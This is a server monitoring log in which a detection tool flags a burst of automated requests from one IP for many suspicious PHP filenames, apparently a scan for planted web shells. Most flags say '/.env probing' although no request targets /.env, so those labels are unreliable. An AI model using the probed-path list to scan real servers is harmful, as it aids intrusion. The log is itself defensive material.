Mar 20 09:11:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:41.181307 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:41.181034072Z 20.220.232.240 - - [20/Mar/2026:09:11:41 +0000] "media.admin.kovicloud.com" "GET /ioxi-o.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:41.248852 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:41.248508219Z 20.220.232.240 - - [20/Mar/2026:09:11:41 +0000] "media.admin.kovicloud.com" "GET /admin/index.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:41.326930 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:41.326674172Z 20.220.232.240 - - [20/Mar/2026:09:11:41 +0000] "media.admin.kovicloud.com" "GET /admin/index.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:41.394428 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:41.394123147Z 20.220.232.240 - - [20/Mar/2026:09:11:41 +0000] "media.admin.kovicloud.com" "GET /sid3.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:41.464031 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:41.463782082Z 20.220.232.240 - - [20/Mar/2026:09:11:41 +0000] "media.admin.kovicloud.com" "GET /sid3.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:41.531336 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:41.531020833Z 20.220.232.240 - - [20/Mar/2026:09:11:41 +0000] "media.admin.kovicloud.com" "GET /d12.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:41.601331 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:41.601060263Z 20.220.232.240 - - [20/Mar/2026:09:11:41 +0000] "media.admin.kovicloud.com" "GET /d12.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:41.669247 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:41.668983011Z 20.220.232.240 - - [20/Mar/2026:09:11:41 +0000] "media.admin.kovicloud.com" "GET /wp-blog.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:41.737172 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:41.736892842Z 20.220.232.240 - - [20/Mar/2026:09:11:41 +0000] "media.admin.kovicloud.com" "GET /wp-blog.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:41.804401 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:41.804143231Z 20.220.232.240 - - [20/Mar/2026:09:11:41 +0000] "media.admin.kovicloud.com" "GET /wp-blog-header.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:41.872214 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:41.871930526Z 20.220.232.240 - - [20/Mar/2026:09:11:41 +0000] "media.admin.kovicloud.com" "GET /wp-blog-header.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:41.939459 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:41.939135952Z 20.220.232.240 - - [20/Mar/2026:09:11:41 +0000] "media.admin.kovicloud.com" "GET /abc.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:42.011843 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:42.011569801Z 20.220.232.240 - - [20/Mar/2026:09:11:42 +0000] "media.admin.kovicloud.com" "GET /abc.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:42.078991 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:42.078709674Z 20.220.232.240 - - [20/Mar/2026:09:11:42 +0000] "media.admin.kovicloud.com" "GET /55b76.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:42.146578 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:42.146343361Z 20.220.232.240 - - [20/Mar/2026:09:11:42 +0000] "media.admin.kovicloud.com" "GET /55b76.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:42.213717 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:42.213423077Z 20.220.232.240 - - [20/Mar/2026:09:11:42 +0000] "media.admin.kovicloud.com" "GET /admin-footer.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:42.281544 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:42.281273826Z 20.220.232.240 - - [20/Mar/2026:09:11:42 +0000] "media.admin.kovicloud.com" "GET /admin-footer.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:42.348742 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:42.348370281Z 20.220.232.240 - - [20/Mar/2026:09:11:42 +0000] "media.admin.kovicloud.com" "GET /wp-good.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:42.416576 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:42.416334023Z 20.220.232.240 - - [20/Mar/2026:09:11:42 +0000] "media.admin.kovicloud.com" "GET /wp-good.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:42.484923 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:42.484695833Z 20.220.232.240 - - [20/Mar/2026:09:11:42 +0000] "media.admin.kovicloud.com" "GET /ccs.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:42.559845 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:42.559605598Z 20.220.232.240 - - [20/Mar/2026:09:11:42 +0000] "media.admin.kovicloud.com" "GET /ccs.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:42.627054 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:42.626807887Z 20.220.232.240 - - [20/Mar/2026:09:11:42 +0000] "media.admin.kovicloud.com" "GET /ws83.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:42.724578 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 response to a GET on a PHP endpoint from an external IP and host header could indicate probing or malformed request patterns typical of automated scanners. Line=2026-03-20T09:11:42.724326297Z 20.220.232.240 - - [20/Mar/2026:09:11:42 +0000] "media.admin.kovicloud.com" "GET /ws83.php HTTP/1.1" 400 143 "-" "-" "-"
Mar 20 09:11:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:42.796823 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:42.796405781Z 20.220.232.240 - - [20/Mar/2026:09:11:42 +0000] "media.admin.kovicloud.com" "GET /inputs.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:42.864793 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:42.864401085Z 20.220.232.240 - - [20/Mar/2026:09:11:42 +0000] "media.admin.kovicloud.com" "GET /inputs.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:42.943220 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:42.942967622Z 20.220.232.240 - - [20/Mar/2026:09:11:42 +0000] "media.admin.kovicloud.com" "GET /drhunthq.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:43.012094 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:43.011815769Z 20.220.232.240 - - [20/Mar/2026:09:11:43 +0000] "media.admin.kovicloud.com" "GET /drhunthq.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:43.081456 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:43.081200858Z 20.220.232.240 - - [20/Mar/2026:09:11:43 +0000] "media.admin.kovicloud.com" "GET /a5e0a.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:43.150140 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:43.149894367Z 20.220.232.240 - - [20/Mar/2026:09:11:43 +0000] "media.admin.kovicloud.com" "GET /a5e0a.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:43.230106 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:43.229826877Z 20.220.232.240 - - [20/Mar/2026:09:11:43 +0000] "media.admin.kovicloud.com" "GET /lib.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:43.298952 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:43.298675924Z 20.220.232.240 - - [20/Mar/2026:09:11:43 +0000] "media.admin.kovicloud.com" "GET /lib.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:43.397465 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:43.397148224Z 20.220.232.240 - - [20/Mar/2026:09:11:43 +0000] "media.admin.kovicloud.com" "GET /gfd.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:43.465215 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:43.464934551Z 20.220.232.240 - - [20/Mar/2026:09:11:43 +0000] "media.admin.kovicloud.com" "GET /gfd.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:43.532329 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:43.532067527Z 20.220.232.240 - - [20/Mar/2026:09:11:43 +0000] "media.admin.kovicloud.com" "GET /ws81.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:43.605727 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 response to a GET on a PHP endpoint from an external IP and host header could indicate probing or malformed request patterns typical of automated scanners. Line=2026-03-20T09:11:43.605492908Z 20.220.232.240 - - [20/Mar/2026:09:11:43 +0000] "media.admin.kovicloud.com" "GET /ws81.php HTTP/1.1" 400 143 "-" "-" "-"
Mar 20 09:11:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:43.684779 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:43.684347508Z 20.220.232.240 - - [20/Mar/2026:09:11:43 +0000] "media.admin.kovicloud.com" "GET /domains.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:43.752406 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:43.752134345Z 20.220.232.240 - - [20/Mar/2026:09:11:43 +0000] "media.admin.kovicloud.com" "GET /domains.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:43.819498 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:43.819245649Z 20.220.232.240 - - [20/Mar/2026:09:11:43 +0000] "media.admin.kovicloud.com" "GET /byypas.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:43.887479 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:43.887245446Z 20.220.232.240 - - [20/Mar/2026:09:11:43 +0000] "media.admin.kovicloud.com" "GET /byypas.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:43.954619 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:43.954331722Z 20.220.232.240 - - [20/Mar/2026:09:11:43 +0000] "media.admin.kovicloud.com" "GET /install.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:44.024512 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:44.023574666Z 20.220.232.240 - - [20/Mar/2026:09:11:44 +0000] "media.admin.kovicloud.com" "GET /install.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:44.204754 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:44.204412807Z 20.220.232.240 - - [20/Mar/2026:09:11:44 +0000] "media.admin.kovicloud.com" "GET /myfile.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:44.388969 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:44.388716937Z 20.220.232.240 - - [20/Mar/2026:09:11:44 +0000] "media.admin.kovicloud.com" "GET /myfile.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:44.460379 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:44.460094555Z 20.220.232.240 - - [20/Mar/2026:09:11:44 +0000] "media.admin.kovicloud.com" "GET /grsiuk.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:44.529103 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:44.528842857Z 20.220.232.240 - - [20/Mar/2026:09:11:44 +0000] "media.admin.kovicloud.com" "GET /grsiuk.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:44.596538 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:44.596286838Z 20.220.232.240 - - [20/Mar/2026:09:11:44 +0000] "media.admin.kovicloud.com" "GET /wp-p2r3q9c8k4.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:44.664743 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:44.664392555Z 20.220.232.240 - - [20/Mar/2026:09:11:44 +0000] "media.admin.kovicloud.com" "GET /wp-p2r3q9c8k4.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:44.732019 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:44.731770255Z 20.220.232.240 - - [20/Mar/2026:09:11:44 +0000] "media.admin.kovicloud.com" "GET /wp-access.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:44.801942 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:44.801693404Z 20.220.232.240 - - [20/Mar/2026:09:11:44 +0000] "media.admin.kovicloud.com" "GET /wp-access.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:44.869575 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:44.869321446Z 20.220.232.240 - - [20/Mar/2026:09:11:44 +0000] "media.admin.kovicloud.com" "GET /inege.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:44.937875 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:44.937647847Z 20.220.232.240 - - [20/Mar/2026:09:11:44 +0000] "media.admin.kovicloud.com" "GET /inege.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:45.005912 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:45.005654576Z 20.220.232.240 - - [20/Mar/2026:09:11:45 +0000] "media.admin.kovicloud.com" "GET /bgymj.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:45.073794 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:45.073553894Z 20.220.232.240 - - [20/Mar/2026:09:11:45 +0000] "media.admin.kovicloud.com" "GET /bgymj.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:45.142004 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:45.141720597Z 20.220.232.240 - - [20/Mar/2026:09:11:45 +0000] "media.admin.kovicloud.com" "GET /6kDPjgFTmvS.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:45.210372 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:45.210095650Z 20.220.232.240 - - [20/Mar/2026:09:11:45 +0000] "media.admin.kovicloud.com" "GET /6kDPjgFTmvS.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:45.297349 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:45.297051366Z 20.220.232.240 - - [20/Mar/2026:09:11:45 +0000] "media.admin.kovicloud.com" "GET /tx78.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:45.367216 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:45.366944510Z 20.220.232.240 - - [20/Mar/2026:09:11:45 +0000] "media.admin.kovicloud.com" "GET /tx78.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:45.434832 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:45.434565015Z 20.220.232.240 - - [20/Mar/2026:09:11:45 +0000] "media.admin.kovicloud.com" "GET /init.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:45.502506 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:45.502264586Z 20.220.232.240 - - [20/Mar/2026:09:11:45 +0000] "media.admin.kovicloud.com" "GET /init.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:45.569796 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:45.569514553Z 20.220.232.240 - - [20/Mar/2026:09:11:45 +0000] "media.admin.kovicloud.com" "GET /ws49.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:45.638068 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 response to a GET on a PHP endpoint from an external IP and host header could indicate probing or malformed request patterns typical of automated scanners. Line=2026-03-20T09:11:45.637793275Z 20.220.232.240 - - [20/Mar/2026:09:11:45 +0000] "media.admin.kovicloud.com" "GET /ws49.php HTTP/1.1" 400 143 "-" "-" "-"
